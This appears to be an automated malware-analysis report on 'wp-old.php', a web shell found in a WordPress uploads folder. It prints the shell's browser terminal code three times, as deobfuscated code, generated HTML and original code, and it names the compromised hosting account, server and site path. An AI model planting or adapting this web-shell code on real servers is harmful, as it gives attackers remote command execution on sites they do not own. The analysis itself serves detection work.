PHP Malware Analysis
wp-old.php
md5: 482a89d0d23d7ffca198ab0e16c97b58
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- u431524636@nl-srv-web261.main-hosting.eu (HTML)
Title
- Shell - ANSSIActive (Deobfuscated, HTML, Original)
Deobfuscated PHP code
<!doctype html>
<html>
<head>
<title>Shell - ANSSIActive</title>
<style>
body {
background: #000;
color: #fff;
font-family: monospace;
}
#terminal {
position: fixed;
left: 0;
bottom: 2em;
padding: 1em;
width: calc(100% - 2em);
max-height: calc(100% - 4em);
margin: 0 auto;
overflow-y: auto;
overflow-x: hidden;
white-space: pre-wrap;
word-break: break-all;
}
#bottombar {
position: fixed;
left: 0;
bottom: 0;
width: 100%;
}
#ps1 {
padding-left: 1em;
line-height: 2em;
height: 2em;
float: left;
max-width: 40%;
padding-right: .5em;
}
#cursor {
height: calc(2em - 1px);
padding: 0;
border: 0;
float: left;
min-width: 60%;
max-width: 80%;
background: #000;
color: #fff;
font-family: monospace;
outline: none;
}
</style>
</head>
<body>
<pre id="terminal"></pre>
<div id="bottombar">
<span id="ps1"></span>
<input id="cursor" autofocus>
</div>
<script>
class Terminal {
constructor() {
this.whoami = 'u431524636';
this.hostname = 'nl-srv-web261.main-hosting.eu';
this.pwd = '/home/u431524636/domains/marketscc.com/public_html';
this.PATH_SEP = '/';
this.commandHistory = [];
this.commandHistoryIndex = this.commandHistory.length;
this.termWindow = document.getElementById('terminal');
this.cursor = document.getElementById('cursor');
this.ps1element = document.getElementById('ps1');
this.ps1element.innerHTML = this.ps1();
this.attachCursor();
// this.execCommand('ifconfig');
}
formatPath(path) {
path = path.replace(/\//g, this.PATH_SEP);
let curPathArr = !path.match(/^(([A-Z]\:)|(\/))/) ? this.pwd.split(this.PATH_SEP) : [];
let pathArr = curPathArr.concat(path.split(this.PATH_SEP).filter(el => el));
let absPath = [];
pathArr.forEach(el => {
if (el === '.') {
// Do nothing
} else if (el === '..') {
absPath.pop();
} else {
absPath.push(el);
}
});
return this.PATH_SEP + (absPath.length === 1 ? absPath[0] + this.PATH_SEP : absPath.join(this.PATH_SEP));
}
getCurrentPath() {
return this.formatPath(this.pwd);
}
updateCurrentPath(newPath) {
this.pwd = this.formatPath(newPath);
}
attachCursor() {
this.cursor.addEventListener('keyup', ({keyCode}) => {
switch (keyCode) {
case 13:
this.execCommand(this.cursor.value);
this.cursor.value = '';
this.ps1element.innerHTML = this.ps1();
this.commandHistoryIndex = this.commandHistory.length;
break;
case 38:
if (this.commandHistoryIndex !== 0) {
this.cursor.value = this.commandHistory[--this.commandHistoryIndex] || '';
}
break;
case 40:
if (this.commandHistoryIndex < this.commandHistory.length) {
this.cursor.value = this.commandHistory[++this.commandHistoryIndex] || '';
}
break;
}
});
}
ps1() {
return `<span style="color:orange">${this.whoami}@${this.hostname}</span>:` +
`<span style="color:limegreen">${this.getCurrentPath()}</span>$ `;
}
execCommand(cmd) {
this.commandHistory.push(cmd);
fetch(document.location.href, {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/json',
'Accept': 'application/json'
}),
body: JSON.stringify({
cmd
})
}).then(
res => res.json(),
err => console.error(err)
).then(({response}) => {
this.termWindow.innerHTML += `${this.ps1()}${cmd}<br>${response}`;
this.termWindow.scrollTop = this.termWindow.scrollHeight;
})
}
}
window.addEventListener('load', () => {
const terminal = new Terminal();
});
</script>
</body>
</html>
Execution traces
data/traces/482a89d0d23d7ffca198ab0e16c97b58_trace-1676247758.029.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:23:03.926775]
1 0 1 0.000140 393528
1 3 0 0.000190 401248 {main} 1 /var/www/html/uploads/wp-old.php 0 0
1 3 1 0.000212 401360
0.000258 314240
TRACE END [2023-02-12 22:23:03.926923]
Generated HTML code
<html><head>
<title>Shell - ANSSIActive</title>
<style>
body {
background: #000;
color: #fff;
font-family: monospace;
}
#terminal {
position: fixed;
left: 0;
bottom: 2em;
padding: 1em;
width: calc(100% - 2em);
max-height: calc(100% - 4em);
margin: 0 auto;
overflow-y: auto;
overflow-x: hidden;
white-space: pre-wrap;
word-break: break-all;
}
#bottombar {
position: fixed;
left: 0;
bottom: 0;
width: 100%;
}
#ps1 {
padding-left: 1em;
line-height: 2em;
height: 2em;
float: left;
max-width: 40%;
padding-right: .5em;
}
#cursor {
height: calc(2em - 1px);
padding: 0;
border: 0;
float: left;
min-width: 60%;
max-width: 80%;
background: #000;
color: #fff;
font-family: monospace;
outline: none;
}
</style>
</head>
<body>
<pre id="terminal"></pre>
<div id="bottombar">
<span id="ps1"><span style="color:orange">u431524636@nl-srv-web261.main-hosting.eu</span>:<span style="color:limegreen">/home/u431524636/domains/marketscc.com/public_html</span>$ </span>
<input id="cursor" autofocus="">
</div>
<script>
class Terminal {
constructor() {
this.whoami = 'u431524636';
this.hostname = 'nl-srv-web261.main-hosting.eu';
this.pwd = '/home/u431524636/domains/marketscc.com/public_html';
this.PATH_SEP = '/';
this.commandHistory = [];
this.commandHistoryIndex = this.commandHistory.length;
this.termWindow = document.getElementById('terminal');
this.cursor = document.getElementById('cursor');
this.ps1element = document.getElementById('ps1');
this.ps1element.innerHTML = this.ps1();
this.attachCursor();
// this.execCommand('ifconfig');
}
formatPath(path) {
path = path.replace(/\//g, this.PATH_SEP);
let curPathArr = !path.match(/^(([A-Z]\:)|(\/))/) ? this.pwd.split(this.PATH_SEP) : [];
let pathArr = curPathArr.concat(path.split(this.PATH_SEP).filter(el => el));
let absPath = [];
pathArr.forEach(el => {
if (el === '.') {
// Do nothing
} else if (el === '..') {
absPath.pop();
} else {
absPath.push(el);
}
});
return this.PATH_SEP + (absPath.length === 1 ? absPath[0] + this.PATH_SEP : absPath.join(this.PATH_SEP));
}
getCurrentPath() {
return this.formatPath(this.pwd);
}
updateCurrentPath(newPath) {
this.pwd = this.formatPath(newPath);
}
attachCursor() {
this.cursor.addEventListener('keyup', ({keyCode}) => {
switch (keyCode) {
case 13:
this.execCommand(this.cursor.value);
this.cursor.value = '';
this.ps1element.innerHTML = this.ps1();
this.commandHistoryIndex = this.commandHistory.length;
break;
case 38:
if (this.commandHistoryIndex !== 0) {
this.cursor.value = this.commandHistory[--this.commandHistoryIndex] || '';
}
break;
case 40:
if (this.commandHistoryIndex < this.commandHistory.length) {
this.cursor.value = this.commandHistory[++this.commandHistoryIndex] || '';
}
break;
}
});
}
ps1() {
return `<span style="color:orange">${this.whoami}@${this.hostname}</span>:` +
`<span style="color:limegreen">${this.getCurrentPath()}</span>$ `;
}
execCommand(cmd) {
this.commandHistory.push(cmd);
fetch(document.location.href, {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/json',
'Accept': 'application/json'
}),
body: JSON.stringify({
cmd
})
}).then(
res => res.json(),
err => console.error(err)
).then(({response}) => {
this.termWindow.innerHTML += `${this.ps1()}${cmd}<br>${response}`;
this.termWindow.scrollTop = this.termWindow.scrollHeight;
})
}
}
window.addEventListener('load', () => {
const terminal = new Terminal();
});
</script>
</body></html>Original PHP code
<!doctype html>
<html>
<head>
<title>Shell - ANSSIActive</title>
<style>
body {
background: #000;
color: #fff;
font-family: monospace;
}
#terminal {
position: fixed;
left: 0;
bottom: 2em;
padding: 1em;
width: calc(100% - 2em);
max-height: calc(100% - 4em);
margin: 0 auto;
overflow-y: auto;
overflow-x: hidden;
white-space: pre-wrap;
word-break: break-all;
}
#bottombar {
position: fixed;
left: 0;
bottom: 0;
width: 100%;
}
#ps1 {
padding-left: 1em;
line-height: 2em;
height: 2em;
float: left;
max-width: 40%;
padding-right: .5em;
}
#cursor {
height: calc(2em - 1px);
padding: 0;
border: 0;
float: left;
min-width: 60%;
max-width: 80%;
background: #000;
color: #fff;
font-family: monospace;
outline: none;
}
</style>
</head>
<body>
<pre id="terminal"></pre>
<div id="bottombar">
<span id="ps1"></span>
<input id="cursor" autofocus>
</div>
<script>
class Terminal {
constructor() {
this.whoami = 'u431524636';
this.hostname = 'nl-srv-web261.main-hosting.eu';
this.pwd = '/home/u431524636/domains/marketscc.com/public_html';
this.PATH_SEP = '/';
this.commandHistory = [];
this.commandHistoryIndex = this.commandHistory.length;
this.termWindow = document.getElementById('terminal');
this.cursor = document.getElementById('cursor');
this.ps1element = document.getElementById('ps1');
this.ps1element.innerHTML = this.ps1();
this.attachCursor();
// this.execCommand('ifconfig');
}
formatPath(path) {
path = path.replace(/\//g, this.PATH_SEP);
let curPathArr = !path.match(/^(([A-Z]\:)|(\/))/) ? this.pwd.split(this.PATH_SEP) : [];
let pathArr = curPathArr.concat(path.split(this.PATH_SEP).filter(el => el));
let absPath = [];
pathArr.forEach(el => {
if (el === '.') {
// Do nothing
} else if (el === '..') {
absPath.pop();
} else {
absPath.push(el);
}
});
return this.PATH_SEP + (absPath.length === 1 ? absPath[0] + this.PATH_SEP : absPath.join(this.PATH_SEP));
}
getCurrentPath() {
return this.formatPath(this.pwd);
}
updateCurrentPath(newPath) {
this.pwd = this.formatPath(newPath);
}
attachCursor() {
this.cursor.addEventListener('keyup', ({keyCode}) => {
switch (keyCode) {
case 13:
this.execCommand(this.cursor.value);
this.cursor.value = '';
this.ps1element.innerHTML = this.ps1();
this.commandHistoryIndex = this.commandHistory.length;
break;
case 38:
if (this.commandHistoryIndex !== 0) {
this.cursor.value = this.commandHistory[--this.commandHistoryIndex] || '';
}
break;
case 40:
if (this.commandHistoryIndex < this.commandHistory.length) {
this.cursor.value = this.commandHistory[++this.commandHistoryIndex] || '';
}
break;
}
});
}
ps1() {
return `<span style="color:orange">${this.whoami}@${this.hostname}</span>:` +
`<span style="color:limegreen">${this.getCurrentPath()}</span>$ `;
}
execCommand(cmd) {
this.commandHistory.push(cmd);
fetch(document.location.href, {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/json',
'Accept': 'application/json'
}),
body: JSON.stringify({
cmd
})
}).then(
res => res.json(),
err => console.error(err)
).then(({response}) => {
this.termWindow.innerHTML += `${this.ps1()}${cmd}<br>${response}`;
this.termWindow.scrollTop = this.termWindow.scrollHeight;
})
}
}
window.addEventListener('load', () => {
const terminal = new Terminal();
});
</script>
</body>
</html>